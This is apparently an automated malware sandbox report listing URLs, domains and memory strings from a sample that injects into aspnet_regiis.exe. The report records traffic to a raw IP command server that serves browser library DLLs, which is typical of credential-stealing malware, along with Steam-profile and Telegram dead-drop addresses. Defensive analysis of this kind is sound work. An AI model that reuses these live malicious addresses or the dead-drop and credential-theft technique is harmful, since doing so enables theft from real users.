                      https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp;0%URL Reputationsafe
                      https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback0%URL Reputationsafe
                      https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL0%URL Reputationsafe
                      https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a0%URL Reputationsafe
                      https://steam.tv/0%URL Reputationsafe
                      https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=english0%URL Reputationsafe
                      https://mozilla.org0/0%URL Reputationsafe
                      http://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
                      https://store.steampowered.com/points/shop/0%URL Reputationsafe
                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                      https://www.ecosia.org/newtab/0%URL Reputationsafe
                      https://lv.queniujq.cn0%URL Reputationsafe
                      https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
                      https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg0%URL Reputationsafe
                      https://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
                      https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt00%URL Reputationsafe
                      https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am0%URL Reputationsafe
                      https://checkout.steampowered.com/0%URL Reputationsafe
                      https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english0%URL Reputationsafe
                      https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=english0%URL Reputationsafe
                      https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png0%URL Reputationsafe
                      https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englis0%URL Reputationsafe
                      https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC0%URL Reputationsafe
                      https://store.steampowered.com/;0%URL Reputationsafe
                      https://store.steampowered.com/about/0%URL Reputationsafe
                      https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&amp;l=english0%URL Reputationsafe
                      http://ocsp.sectigo.com00%URL Reputationsafe
                      https://help.steampowered.com/en/0%URL Reputationsafe
                      https://store.steampowered.com/news/0%URL Reputationsafe
                      https://community.akamai.steamstatic.com/0%URL Reputationsafe
                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                      http://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
                      https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r10%URL Reputationsafe
                      https://recaptcha.net/recaptcha/;0%URL Reputationsafe
                      https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=en0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      steamcommunity.com
                      		104.102.49.254
                      		truetrueunknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://49.12.197.9/true
                        		unknown
                        https://49.12.197.9/freebl3.dlltrue
                          		unknown
                          https://49.12.197.9/sqlp.dlltrue
                            		unknown
                            https://49.12.197.9/softokn3.dlltrue
                              		unknown
                              https://49.12.197.9/vcruntime140.dlltrue
                                		unknown
                                https://49.12.197.9/nss3.dlltrue
                                  		unknown
                                  https://49.12.197.9/mozglue.dlltrue
                                    		unknown

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://duckduckgo.com/chrome_newtabaspnet_regiis.exe, 00000003.00000003.1819386724.0000000002E0B000.00000004.00000020.00020000.00000000.sdmp, BGIIEG.3.drfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://player.vimeo.comaspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://duckduckgo.com/ac/?q=aspnet_regiis.exe, 00000003.00000003.1819386724.0000000002E0B000.00000004.00000020.00020000.00000000.sdmp, BGIIEG.3.drfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&ampaspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                      		unknown
                                      https://49.12.197.9/caspnet_regiis.exe, 00000003.00000003.1984089930.0000000002DE2000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://steamcommunity.com/?subsection=broadcastsaspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                          		unknown
                                          https://49.12.197.9/gaspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://49.12.197.9/Iaspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://49.12.197.9/mozglue.dllLaspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://store.steampowered.com/subscriber_agreement/aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://www.gstatic.cn/recaptcha/aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://steamcommunity.com/profiles/76561199780418869Yaspnet_regiis.exe, 00000003.00000002.2653530510.0000000002CD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://steamcommunity.com/profiles/76561199780418869/badgesaspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                    		unknown
                                                    https://49.12.197.9/Waspnet_regiis.exe, 00000003.00000003.1984089930.0000000002DE2000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      http://www.valvesoftware.com/legal.htmaspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://www.youtube.comaspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://49.12.197.9/HIIJJJKEGIaspnet_regiis.exe, 00000003.00000003.1984089930.0000000002DEF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&ampaspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngaspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://www.google.comaspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            http://cowod.hopto.org_DEBUG.zip/cfile.exe, 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmp, aspnet_regiis.exe, 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngaspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://49.12.197.976561199780418869[1].htm.3.drfalse
                                                                		unknown
                                                                https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=HeLxjRDbQrcV&amp;l=easpnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                  		unknown
                                                                  https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp;aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedbackaspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://steamcommunity.com/profiles/76561199780418869u55uhttps://t.me/ae5edMozilla/5.0file.exe, 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmp, aspnet_regiis.exe, 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696495411400900000.1&ci=1696495411208.12791&ctaaspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DC9000.00000004.00000020.00020000.00000000.sdmp, DBFIEH.3.drfalse
                                                                      		unknown
                                                                      https://support.mozilla.org/products/firefoxgro.allizom.troppus.GNzbMA16ssY5HDGCFH.3.drfalse
                                                                        		unknown
                                                                        https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=2ZRoxzolaspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                          		unknown
                                                                          https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tLaspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://49.12.197.9/softokn3.dllBaspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2aaspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://s.ytimg.com;aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              https://49.12.197.9/0aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                https://49.12.197.9/12.197.9/aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1937588640.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1903702443.0000000002DED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  https://steam.tv/aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://49.12.197.9/5aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1937588640.0000000002DED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    https://t.me/ae5edfile.exe, 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmp, aspnet_regiis.exe, aspnet_regiis.exe, 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      http://www.mozilla.com/en-US/blocklist/aspnet_regiis.exe, aspnet_regiis.exe, 00000003.00000002.2680382031.000000006CADD000.00000002.00000001.01000000.0000000B.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.3.drfalse
                                                                                        		unknown
                                                                                        https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=englishaspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        https://mozilla.org0/aspnet_regiis.exe, 00000003.00000003.1968723157.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1857214387.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        https://steamcommunity.com/saspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D1E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		unknown
                                                                                          https://49.12.197.9CBAAECaspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                            		unknown
                                                                                            https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=fWwPaspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                                              		unknown
